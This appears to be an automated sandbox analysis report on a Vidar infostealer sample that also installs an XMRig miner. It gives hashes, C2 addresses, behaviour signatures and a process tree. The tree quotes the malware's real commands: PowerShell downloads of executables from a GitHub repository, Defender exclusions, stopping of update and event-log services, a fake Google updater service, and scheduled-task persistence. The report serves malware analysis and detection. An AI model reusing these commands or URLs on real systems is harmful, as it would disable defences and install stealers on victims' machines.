Resubmissions

21/04/2025, 09:34

250421-ljrrga1rt5 10

21/04/2025, 09:28

250421-lffj2aytdt 7

Analysis

  • max time kernel
    125s
  • max time network
    129s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/04/2025, 09:34

General

  • Target

    S0FTWARE.exe

  • Size

    349KB

  • MD5

    656a1813b1f6b1b23f86868148f03c97

  • SHA1

    171427be31c7cd18d2838e9c985240a77370c99c

  • SHA256

    98a355651f9f043e1ed3eaf1ac5ef8ff617f3438969e6488ef05ada40bac12d2

  • SHA512

    69444b0a88c3a46da193a4920546a371b9243cb8a925ae725dc33e964f2342fe554e6e7f163f5d7eb6eb2b57e8d40d26e7fb2ff0ebf6b086402b20b69d21b2a7

  • SSDEEP

    6144:ZdCuJHaXn51HBOWGEI8ue6/W4yJIyhBzOTVa:ZwuJqnbBjGEIn/W4yOk1

Malware Config

Extracted

Family

vidar

Version

13.5

Botnet

fe765de57643ac9d227ea7737a97bb87

C2

https://t.me/v00rd

https://steamcommunity.com/profiles/76561199846773220

Attributes
  • user_agent

    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0

Signatures

  • Detect Vidar Stealer 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 9 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 3 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Stops running service(s) 4 TTPs
  • Uses browser remote debugging 2 TTPs 8 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • UPX packed file 14 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 52 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 37 IoCs
  • Suspicious use of FindShellTrayWindow 27 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\S0FTWARE.exe
    "C:\Users\Admin\AppData\Local\Temp\S0FTWARE.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:5204
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\jejppb', 'C:\Users', 'C:\ProgramData'"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5920
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\jejppb', 'C:\Users', 'C:\ProgramData'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1216
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\jejppb\wszgzsr.exe'"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4764
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\jejppb\wszgzsr.exe'"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4940
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\jejppb\ruhgwolx.exe'"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4912
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\jejppb\ruhgwolx.exe'"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5036
    • C:\Users\Admin\AppData\Local\jejppb\wszgzsr.exe
      "C:\Users\Admin\AppData\Local\jejppb\wszgzsr.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4920
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        3⤵
        • Uses browser remote debugging
        • Checks processor information in registry
        • Enumerates system info in registry
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:5492
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa4eacdcf8,0x7ffa4eacdd04,0x7ffa4eacdd10
          4⤵
            PID:5404
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1548,i,6776491474880095691,7700440965466412932,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2152 /prefetch:3
            4⤵
              PID:5172
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2028,i,6776491474880095691,7700440965466412932,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2024 /prefetch:2
              4⤵
                PID:2952
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2352,i,6776491474880095691,7700440965466412932,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2540 /prefetch:8
                4⤵
                  PID:2208
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3188,i,6776491474880095691,7700440965466412932,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3224 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:2944
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3196,i,6776491474880095691,7700440965466412932,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3052 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:5124
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4220,i,6776491474880095691,7700440965466412932,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4264 /prefetch:2
                  4⤵
                  • Uses browser remote debugging
                  PID:5292
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4560,i,6776491474880095691,7700440965466412932,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4676 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:2592
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4204,i,6776491474880095691,7700440965466412932,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5320 /prefetch:8
                  4⤵
                    PID:4436
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5496,i,6776491474880095691,7700440965466412932,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5508 /prefetch:8
                    4⤵
                      PID:6044
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                    3⤵
                    • Uses browser remote debugging
                    • Enumerates system info in registry
                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                    • Suspicious use of FindShellTrayWindow
                    PID:4820
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x260,0x7ffa571bf208,0x7ffa571bf214,0x7ffa571bf220
                      4⤵
                        PID:5212
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2164,i,10424181840247258355,1324387607671200183,262144 --variations-seed-version --mojo-platform-channel-handle=2172 /prefetch:2
                        4⤵
                          PID:5244
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1940,i,10424181840247258355,1324387607671200183,262144 --variations-seed-version --mojo-platform-channel-handle=2276 /prefetch:3
                          4⤵
                            PID:1948
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2520,i,10424181840247258355,1324387607671200183,262144 --variations-seed-version --mojo-platform-channel-handle=2652 /prefetch:8
                            4⤵
                              PID:5368
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3448,i,10424181840247258355,1324387607671200183,262144 --variations-seed-version --mojo-platform-channel-handle=3512 /prefetch:1
                              4⤵
                              • Uses browser remote debugging
                              PID:4192
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3456,i,10424181840247258355,1324387607671200183,262144 --variations-seed-version --mojo-platform-channel-handle=3516 /prefetch:1
                              4⤵
                              • Uses browser remote debugging
                              PID:3892
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\lxl6p" & exit
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:1308
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout /t 11
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Delays execution with timeout.exe
                              PID:3444
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\jejppb\innkpa.exe'"
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1660
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\jejppb\innkpa.exe'"
                            3⤵
                            • Blocklisted process makes network request
                            • Command and Scripting Interpreter: PowerShell
                            • Downloads MZ/PE file
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1340
                        • C:\Users\Admin\AppData\Local\jejppb\ruhgwolx.exe
                          "C:\Users\Admin\AppData\Local\jejppb\ruhgwolx.exe"
                          2⤵
                          • Checks computer location settings
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of WriteProcessMemory
                          PID:896
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /C schtasks /create /tn GoogleUpdaterex /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                            3⤵
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:4348
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /create /tn GoogleUpdaterex /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Scheduled Task/Job: Scheduled Task
                              PID:5996
                        • C:\Users\Admin\AppData\Local\jejppb\innkpa.exe
                          "C:\Users\Admin\AppData\Local\jejppb\innkpa.exe"
                          2⤵
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Drops file in System32 directory
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4992
                          • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                            C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                            3⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2096
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                            3⤵
                              PID:3788
                              • C:\Windows\system32\wusa.exe
                                wusa /uninstall /kb:890830 /quiet /norestart
                                4⤵
                                  PID:4528
                              • C:\Windows\system32\sc.exe
                                C:\Windows\system32\sc.exe stop UsoSvc
                                3⤵
                                • Launches sc.exe
                                PID:2136
                              • C:\Windows\system32\sc.exe
                                C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                3⤵
                                • Launches sc.exe
                                PID:5136
                              • C:\Windows\system32\sc.exe
                                C:\Windows\system32\sc.exe stop wuauserv
                                3⤵
                                • Launches sc.exe
                                PID:3924
                              • C:\Windows\system32\sc.exe
                                C:\Windows\system32\sc.exe stop bits
                                3⤵
                                • Launches sc.exe
                                PID:880
                              • C:\Windows\system32\sc.exe
                                C:\Windows\system32\sc.exe stop dosvc
                                3⤵
                                • Launches sc.exe
                                PID:2748
                              • C:\Windows\system32\powercfg.exe
                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                3⤵
                                • Power Settings
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5276
                              • C:\Windows\system32\powercfg.exe
                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                3⤵
                                • Power Settings
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2500
                              • C:\Windows\system32\powercfg.exe
                                C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                3⤵
                                • Power Settings
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3488
                              • C:\Windows\system32\powercfg.exe
                                C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                3⤵
                                • Power Settings
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2744
                              • C:\Windows\system32\sc.exe
                                C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineK"
                                3⤵
                                • Launches sc.exe
                                PID:4468
                              • C:\Windows\system32\sc.exe
                                C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto"
                                3⤵
                                • Launches sc.exe
                                PID:5772
                              • C:\Windows\system32\sc.exe
                                C:\Windows\system32\sc.exe stop eventlog
                                3⤵
                                • Launches sc.exe
                                PID:1508
                              • C:\Windows\system32\sc.exe
                                C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK"
                                3⤵
                                • Launches sc.exe
                                PID:5128
                          • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                            "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                            1⤵
                              PID:5856
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                              1⤵
                                PID:2068
                              • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                1⤵
                                  PID:3156
                                • C:\ProgramData\GoogleUP\Chrome\Updater.exe
                                  C:\ProgramData\GoogleUP\Chrome\Updater.exe
                                  1⤵
                                  • Drops file in Drivers directory
                                  • Executes dropped EXE
                                  • Drops file in System32 directory
                                  • Suspicious use of SetThreadContext
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:5292
                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                    2⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Drops file in System32 directory
                                    • Modifies data under HKEY_USERS
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1872
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                    2⤵
                                      PID:2284
                                      • C:\Windows\system32\wusa.exe
                                        wusa /uninstall /kb:890830 /quiet /norestart
                                        3⤵
                                          PID:5636
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe stop UsoSvc
                                        2⤵
                                        • Launches sc.exe
                                        PID:5084
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                        2⤵
                                        • Launches sc.exe
                                        PID:2860
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe stop wuauserv
                                        2⤵
                                        • Launches sc.exe
                                        PID:5956
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe stop bits
                                        2⤵
                                        • Launches sc.exe
                                        PID:3116
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe stop dosvc
                                        2⤵
                                        • Launches sc.exe
                                        PID:3724
                                      • C:\Windows\system32\powercfg.exe
                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                        2⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3352
                                      • C:\Windows\system32\powercfg.exe
                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                        2⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4352
                                      • C:\Windows\system32\powercfg.exe
                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                        2⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3008
                                      • C:\Windows\system32\powercfg.exe
                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                        2⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:752
                                      • C:\Windows\system32\conhost.exe
                                        C:\Windows\system32\conhost.exe
                                        2⤵
                                          PID:5576
                                        • C:\Windows\explorer.exe
                                          explorer.exe
                                          2⤵
                                          • Modifies data under HKEY_USERS
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1088
                                      • C:\Users\Admin\AppData\Roaming\service.exe
                                        C:\Users\Admin\AppData\Roaming\service.exe
                                        1⤵
                                        • Checks computer location settings
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        PID:4560
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /C schtasks /create /tn GoogleUpdaterex /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                                          2⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:4116
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /create /tn GoogleUpdaterex /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:5840

                                      Network

                                      MITRE ATT&CK Enterprise v16

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                        Filesize

                                        414B

                                        MD5

                                        d29dddfe98185aa1a3b6f5c991cf371a

                                        SHA1

                                        11af6b1bec7749fede7444120fc3089f76bc5c2a

                                        SHA256

                                        4cb2280631bef13295d835473ca31e6ca32f392b11dca0d5f5b0b141af1d42ba

                                        SHA512

                                        0a194144745eece7d8b50370643cb2f10ded3105f2f2b335eb3bba5a18d0fb6d0566797a8afe9accc7c4ddf48cecde03110b1c11d3859b00ae0957471509736b

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                        Filesize

                                        2B

                                        MD5

                                        d751713988987e9331980363e24189ce

                                        SHA1

                                        97d170e1550eee4afc0af065b78cda302a97674c

                                        SHA256

                                        4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                        SHA512

                                        b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                        Filesize

                                        80KB

                                        MD5

                                        1747704c43fa89747140a194a21a3e9f

                                        SHA1

                                        abe967f33b895bdccfcadfa30905a7a069fb184a

                                        SHA256

                                        b9029be33aaa6cbe8daeba23b393eda6361883d4197d183a99591d5797199f5f

                                        SHA512

                                        a7507361c3af9cb8f0d17e7a6bfe4a0e9d22cf4d2171740dec4112ddec427d13bc305cc580e1839ad846cfdd8368459502791ecce038f738ebbaf928aad8f963

                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                        Filesize

                                        2KB

                                        MD5

                                        d85ba6ff808d9e5444a4b369f5bc2730

                                        SHA1

                                        31aa9d96590fff6981b315e0b391b575e4c0804a

                                        SHA256

                                        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                        SHA512

                                        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                        Filesize

                                        280B

                                        MD5

                                        65044109d1beb8ed8d59560642cbc519

                                        SHA1

                                        0084485b0aa26069232fab51ee603682e8edfd17

                                        SHA256

                                        a1e0b448218678b30356cbbe4092ea091435e7450822a9748361b6e8b198962d

                                        SHA512

                                        96dcc68fe92f98c4329a8335cfffdb0849a52562431045ccc42076bda0abf3842491303fb669246bfd04e64113688d3f90000a09571dd76ff84b52e34e45f9b6

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\b063b10c-aa74-40e9-8097-2e7a6b21975e\index-dir\the-real-index

                                        Filesize

                                        1KB

                                        MD5

                                        0310ba59c01fef57856943c15bafc289

                                        SHA1

                                        d138f3d3a7aaeeb71f515c7ea597a294b36c9660

                                        SHA256

                                        f6d9289893636000f45e1530c132104018bde480c2b240ef6403c3bf13ebced6

                                        SHA512

                                        c7b111fb9bd719583d89cc1ceaaf772873c15b5dc444d6531da3232f12c705a1dfc43de5b5b284f488e597a0f8e1d14eae1c181d12ead1c86dd65114addc53ed

